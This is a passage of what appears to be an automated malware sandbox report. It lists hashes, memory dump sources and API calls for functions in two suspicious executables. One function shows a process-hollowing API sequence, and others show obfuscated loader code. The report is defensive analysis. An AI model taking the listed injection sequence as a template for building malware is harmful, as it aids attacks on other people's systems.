Instruction Fuzzy Hash: 0701A775A001058FE704CF69C4908BBFBB6FFC8210709C2AED41987301DA709C45CB90

Function 008A6C60 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 010310f5499bb329aae105f3605a23ff9c2f7501024c572111ba7ea60d866a97
Instruction ID: ee7920c8c715795b18062485eb8f9fce2d205938c64f8950a2d13b36e419fee9
Opcode Fuzzy Hash: 010310f5499bb329aae105f3605a23ff9c2f7501024c572111ba7ea60d866a97
Instruction Fuzzy Hash: 5BF0A470A441199FEB19DB64C4557EE7BF1EB89314F14402AC805F7385DF791E098BA2

Function 073C91C9 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072e3dd89b59cda95904f441b8c73e0b8f776ee7d63c7d97cfed38064cd1bc47
Instruction ID: 8a1fc7142ca89078f6bb442e209b864364da27d289f639c501b71c9c9802edd7
Opcode Fuzzy Hash: 072e3dd89b59cda95904f441b8c73e0b8f776ee7d63c7d97cfed38064cd1bc47
Instruction Fuzzy Hash: 96F0A9711193858FE3129B30EC997493F34AE1620070A40EBE08ACA5A3DA29995BCB22

Function 0039D7CC Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2663236708.000000000039D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0039D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_39d000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 845eb4eef86be69961b5d8f8b753672e4d04ab3d77b614085e095cff4f977433
Instruction ID: 971e6563d9d2a62fe4b387246064aadcf48d1d9b1297a625cc0d76ba495d565d
Opcode Fuzzy Hash: 845eb4eef86be69961b5d8f8b753672e4d04ab3d77b614085e095cff4f977433
Instruction Fuzzy Hash: 7BF0C271408340AEEB218A05CC88B62FF98EB51734F18C45EED0C0A287C378A844CAB0

Function 073CDE70 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87f87d2808edcaaeda97415ab9e2021b9a0f5eb93f550cc8fea7f79e07ab0d12
Instruction ID: 65997c9bdd3a86a0d450647926a9434516c2b7c789e9b95ccd94459a5b9957e7
Opcode Fuzzy Hash: 87f87d2808edcaaeda97415ab9e2021b9a0f5eb93f550cc8fea7f79e07ab0d12
Instruction Fuzzy Hash: 4FF0F9B0E14206DFDB44EFA9D801AEEBFF4EB08250F10496EE505E7201D3359941CB91

Function 073CDE80 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1446a45a44517c66511fef8ce6865741454379dc48988365d306da2613f20cbd
Instruction ID: ff72546cdecbe9f280b723fba07b1b6e7fcec1c4da6cded26cbcdc9bb62b480d
Opcode Fuzzy Hash: 1446a45a44517c66511fef8ce6865741454379dc48988365d306da2613f20cbd
Instruction Fuzzy Hash: D6F0D0B0E1420A9FDB54DFA9D841A6EBBF4FB48200F10456EE918E7600D77599018B91

Function 073CDE17 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c50f4505170f9ff82c95a80c6e5e0091ebe3e7cec4ac409bc24bc5c73d9c2ed2
Instruction ID: eb3c0bf9f2ceb0581190a5ccd2727c3e95528e7782ccc8ee08efe96446f919c3
Opcode Fuzzy Hash: c50f4505170f9ff82c95a80c6e5e0091ebe3e7cec4ac409bc24bc5c73d9c2ed2
Instruction Fuzzy Hash: 27E06DB0D5020AEFE750EF78C58469FBBF0AB08614F21847AD018E7310E7708906CF41

Function 008A9297 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f52c43661b6b8a177dde9bc35475c368b8395edeb8e95559e9184b2f0aebd020
Instruction ID: dc0a9309c9e24db854beecd627a44c6c4f300fa9a30f9ac0c8caa35a5856a351
Opcode Fuzzy Hash: f52c43661b6b8a177dde9bc35475c368b8395edeb8e95559e9184b2f0aebd020
Instruction Fuzzy Hash: A4E0CD741843354FD703F735A8E19CD3BA1DEE06057018629D0464F56BDE74444B4B80

Function 073CDE28 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26815d5dd28090b80e45bef85ee0a189224cdeae5147002e7ecc47ce7c917b35
Instruction ID: 2bf53e62118f0facf238a409c5b57e9098cda68075a59143acda7c8ec64e7dc7
Opcode Fuzzy Hash: 26815d5dd28090b80e45bef85ee0a189224cdeae5147002e7ecc47ce7c917b35
Instruction Fuzzy Hash: FEE092B0E5020ADFD740EFB9C945A9EBBF4AB08600F1185A9D019E7211E7749A058F91

Function 008AC36D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 622f8b17707f32652ea4cfc6930cf4b077afe2f5d2c2430d8a7a438971d74f05
Instruction ID: 45c2d67a4794d96f51d75eda7436035668862aeed78beaf385146e3ccf591c63
Opcode Fuzzy Hash: 622f8b17707f32652ea4cfc6930cf4b077afe2f5d2c2430d8a7a438971d74f05
Instruction Fuzzy Hash: 53D0673AB40158AFCB049F98EC40DDDB776FB98221B448126E916A7261C631A921DB54

Function 073CDF20 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a95168088a40d678b1daf08d7e6380516fbca3bf2eb30564daa76bb7a88e51f5
Instruction ID: 49de5b47374fce979684f38687c36ec95b2862a1d88f9fb02d74275566672956
Opcode Fuzzy Hash: a95168088a40d678b1daf08d7e6380516fbca3bf2eb30564daa76bb7a88e51f5
Instruction Fuzzy Hash: 77D012332502095E5B40EBA4F844D5777ECBB24700700C432F508C7431E621E964DB91

Function 008A92A8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e1e1ae7b52b89f54c925250041dc24f6a7a49d570b0bbeb32a4bc133fed86b9
Instruction ID: eeb17d05cd50ab4661b7ce7d325d68cc76251d2b8471c75777328b95c9322939
Opcode Fuzzy Hash: 4e1e1ae7b52b89f54c925250041dc24f6a7a49d570b0bbeb32a4bc133fed86b9
Instruction Fuzzy Hash: 99C0127004432A8AC602F765F845A5937AAEBD03137518935F00A0E53EEE7859854790

Function 073C115B Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6f2442f08a818786e039e1df87c698e0ea15c5c8586ba41f55a79bd77ff8fa
Instruction ID: e7370b2d48d9f1619889de7207e033356c0af5ffa6e6629e59c6f4c2b4a88fda
Opcode Fuzzy Hash: 9c6f2442f08a818786e039e1df87c698e0ea15c5c8586ba41f55a79bd77ff8fa
Instruction Fuzzy Hash: F8B092363402048BC7462678E10806CB792EAC417A31480BAD50DCA210D93284478700

Non-executed Functions

Function 008A640F Relevance: 16.4, Strings: 13, Instructions: 164COMMON

Download Yara Rule

Strings

Te^q, xrefs: 008A64BF
Te^q, xrefs: 008A6478
Te^q, xrefs: 008A64AA
Te^q, xrefs: 008A655D
Te^q, xrefs: 008A6513
Te^q, xrefs: 008A6460
Te^q, xrefs: 008A6619
Te^q, xrefs: 008A643A
Te^q, xrefs: 008A649C
Te^q, xrefs: 008A654D
Te^q, xrefs: 008A6644
Te^q, xrefs: 008A64CB
Te^q, xrefs: 008A6523

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q
API String ID: 0-1012465941
Opcode ID: c2e4deb3091382960f27283da100323df84d0ac98dbf9aca7b0dcba99393706c
Instruction ID: 6da1fcece9133ba36aedc5f2710bcf199ac72b43bb8b5f13852fc3a7a4730a36
Opcode Fuzzy Hash: c2e4deb3091382960f27283da100323df84d0ac98dbf9aca7b0dcba99393706c
Instruction Fuzzy Hash: 0A516474F04108CFEB149BACD4686BD77E2FB8A705F28492AD412EB74CEA70CC559B91

Function 008A5200 Relevance: 10.3, Strings: 8, Instructions: 272COMMON

Download Yara Rule

Strings

LR^q, xrefs: 008A5444
$^q, xrefs: 008A52D8
$^q, xrefs: 008A5547
$^q, xrefs: 008A5584
$^q, xrefs: 008A5537
LR^q, xrefs: 008A5500
LR^q, xrefs: 008A5452
$^q, xrefs: 008A5574

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$LR^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-200684741
Opcode ID: 9f99de9652831502df0878cf7ee1d7632199474f5cf7dcfd0eba62f7c464e53a
Instruction ID: 3a9eb99bb7d44b7a4164ae3c078f949ed8dc312219445f741d54b755f223684a
Opcode Fuzzy Hash: 9f99de9652831502df0878cf7ee1d7632199474f5cf7dcfd0eba62f7c464e53a
Instruction Fuzzy Hash: 38B14974E0451CDFDB18CF99D480AADB7F2FB89300F248516E816EB755CA34AC81CB94

Function 008A59F0 Relevance: 8.9, Strings: 7, Instructions: 148COMMON

Download Yara Rule

Strings

.5Y, xrefs: 008A5B70
XX^q, xrefs: 008A5AAF
XX^q, xrefs: 008A5A9F
XX^q, xrefs: 008A5B0C
XX^q, xrefs: 008A5A6D
XX^q, xrefs: 008A5A5D
XX^q, xrefs: 008A5B28

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: .5Y$XX^q$XX^q$XX^q$XX^q$XX^q$XX^q
API String ID: 0-1540955780
Opcode ID: a3b7835c708c8d55ba71d270395aa1db848df82bf976a741b92a0e07197a13ad
Instruction ID: 4ef19f08690c7d3c488c0cad70b9e1b8a2e16c3fc4d041eba06f9e362a326d4e
Opcode Fuzzy Hash: a3b7835c708c8d55ba71d270395aa1db848df82bf976a741b92a0e07197a13ad
Instruction Fuzzy Hash: 8451B034B04619DFEB148F98D4947ADB7B1FF8A311F244526D002EBA90DB34ADC6DB51

Function 008A59EB Relevance: 6.4, Strings: 5, Instructions: 137COMMON

Download Yara Rule

Strings

.5Y, xrefs: 008A5B70
XX^q, xrefs: 008A5A9F
XX^q, xrefs: 008A5B0C
XX^q, xrefs: 008A5B28
XX^q, xrefs: 008A5A5D

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: .5Y$XX^q$XX^q$XX^q$XX^q
API String ID: 0-1775173428
Opcode ID: 13517c11c24672779381440db071b09eacf565573c4370943bf69939928b1164
Instruction ID: b31d150f37d103dca80304bb870a2e3a2b69391e1227cc55c91032cc956a30b4
Opcode Fuzzy Hash: 13517c11c24672779381440db071b09eacf565573c4370943bf69939928b1164
Instruction Fuzzy Hash: D851E234B04619CFEB148F98C4947ADB7B1FF86311F248666D002EBA90D7349DC6DB51

Function 008A61D6 Relevance: 5.1, Strings: 4, Instructions: 72COMMON

Download Yara Rule

Strings

Te^q, xrefs: 008A628C
Te^q, xrefs: 008A62AB
Zcq, xrefs: 008A62FD
Zcq, xrefs: 008A632E

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$Zcq$Zcq
API String ID: 0-4108195471
Opcode ID: 7a7c5ae77e505a95ddcfaa743e646c92baaa93b4bd37ac04743c340ae3e05b68
Instruction ID: 185c8a4ca0a0e37dc62fe7bb51860f46d2874af00eace5db639e9191064fa79a
Opcode Fuzzy Hash: 7a7c5ae77e505a95ddcfaa743e646c92baaa93b4bd37ac04743c340ae3e05b68
Instruction Fuzzy Hash: 7C213270A04109DFFF048B98E45877D7BB2FB46315F6C0926D402D7B8CE7798CA59651

Function 008A625C Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

Te^q, xrefs: 008A628C
Te^q, xrefs: 008A62AB
Zcq, xrefs: 008A62FD
Zcq, xrefs: 008A632E

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$Zcq$Zcq
API String ID: 0-4108195471
Opcode ID: 79ee9631cc80b241eba5a33231fe8921fa1f72b9e49c05673822357f39ee107d
Instruction ID: 870ee8793c549073d8ae8b207fc67c0a026e7530b4a179fc2ffd4ed9d071c5c4
Opcode Fuzzy Hash: 79ee9631cc80b241eba5a33231fe8921fa1f72b9e49c05673822357f39ee107d
Instruction Fuzzy Hash: FB115270A04209DFFF004B98D45877E7BB1F746315F680925D502EBB8CE63888A59B51

Function 008A9480 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 008A94BE
\;^q, xrefs: 008A948C
\;^q, xrefs: 008A9496
\;^q, xrefs: 008A94B2

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 7949c715c4ce28e8b23e4826b32a2805d95677a54567272da205218900d52f1f
Instruction ID: 54c967f5290d5ebf7055c682a99455e3689ff8f34ce8c9e78caa4aae64aeb9d4
Opcode Fuzzy Hash: 7949c715c4ce28e8b23e4826b32a2805d95677a54567272da205218900d52f1f
Instruction Fuzzy Hash: C701D4317191198FEF148E2DC48492637EBFF8EB613254469E886CF7B0DA71DC429758

Analysis Process: NjdbLPleIutA8FKI_S3fRztd.exePID: 180, Parent PID: 7008COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	30%
Signature Coverage:	37.7%
Total number of Nodes:	130
Total number of Limit Nodes:	20

Executed Functions

Function 004A7829 Relevance: 72.0, APIs: 35, Strings: 6, Instructions: 231
timelibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 004A78A7
DeleteVolumeMountPointW.KERNEL32(00000000), ref: 004A78AE
GetCommandLineA.KERNEL32 ref: 004A78B4
lstrcatW.KERNEL32(?,00000000), ref: 004A78D9
InterlockedExchange.KERNEL32(?,00000000), ref: 004A78E5
SetActiveWindow.USER32(00000000), ref: 004A78EC
TryEnterCriticalSection.KERNEL32(?), ref: 004A78F7
WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004A790D
CopyRect.USER32(?,?), ref: 004A791D
DebugActiveProcessStop.KERNEL32(00000000), ref: 004A7924
GetAtomNameW.KERNEL32(00000000,00000000,00000000), ref: 004A792D
GlobalDeleteAtom.KERNEL32(00000000), ref: 004A7934
GetTimeZoneInformation.KERNEL32(?), ref: 004A7942
GetComputerNameW.KERNEL32(00000000,00000000), ref: 004A794A
_memset.LIBCMT ref: 004A795C
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 004A796B
DebugBreak.KERNEL32 ref: 004A7971
EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 004A797A
LoadLibraryA.KERNEL32(00000000), ref: 004A7990
LoadLibraryA.KERNEL32(emuritowuwep), ref: 004A7997
SetCommMask.KERNELBASE(00000000,00000000), ref: 004A79AB
GetTickCount.KERNEL32 ref: 004A79B1
GetSystemTimes.KERNEL32(?,?,?), ref: 004A79C6
FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004A79EC
OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 004A7A0A
CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 004A7A13
FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004A7A27
__vswprintf.LIBCMT ref: 004A7A3E
_calloc.LIBCMT ref: 004A7A4B
_printf.LIBCMT ref: 004A7A57
_calloc.LIBCMT ref: 004A7A63
_fgetpos.LIBCMT ref: 004A7A6A
_calloc.LIBCMT ref: 004A7A71
LocalAlloc.KERNELBASE(00000000,?,?,?), ref: 004A7A80
LoadLibraryA.KERNELBASE(msimg32.dll), ref: 004A7AC3

Strings

VirtualProtect, xrefs: 004A7A38, 004A7A3D, 004A7A56
msimg32.dll, xrefs: 004A7ABE
emuritowuwep, xrefs: 004A7992
}$, xrefs: 004A7AE7
%s %c, xrefs: 004A7A51
0 %f, xrefs: 004A7A33

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: LibraryLoad_calloc$ActiveAtomCommDebugDeleteNameTimerWaitable$AllocBreakCommandComputerConfigConsoleCopyCountCreateCriticalDateDefaultDriveEnterEnumExchangeFoldFormatFormatsGlobalInformationInterlockedLineLocalLogicalMaskMessageMountOpenPointProcessRectSectionStopStringStringsSystemTickTimeTimesVolumeWindowWriteZone__vswprintf_fgetpos_memset_printflstrcat
String ID: %s %c$0 %f$VirtualProtect$emuritowuwep$msimg32.dll$}$
API String ID: 4223693206-2115628790
Opcode ID: 564bcb48db2b36318d894bddd3ea90382717a3601369224ba8dd1487708703bf
Instruction ID: b8dea9801482fd01cfd1067a498fa11e353114709f9052ddaeecfa012f4ff342
Opcode Fuzzy Hash: 564bcb48db2b36318d894bddd3ea90382717a3601369224ba8dd1487708703bf
Instruction Fuzzy Hash: 5B71AF7140A620ABC331AB61EC499AF3F6CEF6B355B01053FF249D2161DB784546CBAE

Function 02000110 Relevance: 21.2, APIs: 14, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02000156
CreateProcessA.KERNELBASE(?,00000000), ref: 02000255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02000270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02000283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0200029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 020002C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 020002E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02000304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0200032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02000399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 020003BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 020003E1
ResumeThread.KERNELBASE(00000000), ref: 020003ED
ExitProcess.KERNEL32(00000000), ref: 02000412

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFreeReadResumeSectionUnmapView
String ID:
API String ID: 3993611425-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: e77624d7c092b02ccbe4eded6c67a663411539a89ff5bee57f35d2d7770d17cb
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: AEB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94

Function 006477C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006477EE
Module32First.KERNEL32(00000000,00000224), ref: 0064780E

Memory Dump Source

Source File: 0000000A.00000002.2963054220.0000000000647000.00000040.00000020.00020000.00000000.sdmp, Offset: 00647000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_647000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 2e869d8b0b39e818d2e9132da7c18290762d1cf4182a49f00b48c7cf86e3d8ae
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: BEF090362007146FD7203BF9AC8DFAEB6E9EF99725F100638E642A11C0DB70EC458A61

Function 00401327 Relevance: 21.1, APIs: 14, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 00401372
__mtinit.LIBCMT ref: 00401378
_fast_error_exit.LIBCMT ref: 00401383
__RTC_Initialize.LIBCMT ref: 00401389
__ioinit.LIBCMT ref: 00401391
__amsg_exit.LIBCMT ref: 0040139C
GetCommandLineW.KERNEL32 ref: 004013A2
__wsetargv.LIBCMT ref: 004013B6
__amsg_exit.LIBCMT ref: 004013C1
__wsetenvp.LIBCMT ref: 004013C7
__amsg_exit.LIBCMT ref: 004013D2
__cinit.LIBCMT ref: 004013D9
__amsg_exit.LIBCMT ref: 004013E4
__wwincmdln.LIBCMT ref: 004013EA

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
String ID:
API String ID: 2477803136-0
Opcode ID: 70f8b1119466b1b414ff4d00518d2b9ecb3f839af7780154a84f5fabeea9db00
Instruction ID: 8c17f6059ffbf052f1353c0810e5ff4f3cc530814015d503f08207b996c2b9f8
Opcode Fuzzy Hash: 70f8b1119466b1b414ff4d00518d2b9ecb3f839af7780154a84f5fabeea9db00
Instruction Fuzzy Hash: 0E21C7B0D0034499EB547BB2A946B6E36A8AF8070DF10447FFA05BA5E3EE7C8941875D

Function 02000420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02000533

Strings

0, xrefs: 02000492
mfoaskdfnoa, xrefs: 02000520, 02000523
d, xrefs: 02000584
saodkfnosa9uin, xrefs: 020004DA

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 60fdd0c9615689dd47e30d14a5abb82ff96c39c1376b6d96ea38e603a089d16e
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 21510870E08388DAFB11CBA8C849BDEBFB2AF15708F144158D5446F2C6C7BA5658CB66

Function 020005B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 020005EC

Strings

o, xrefs: 02000600
apfHQ, xrefs: 020005E2, 020005E5

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

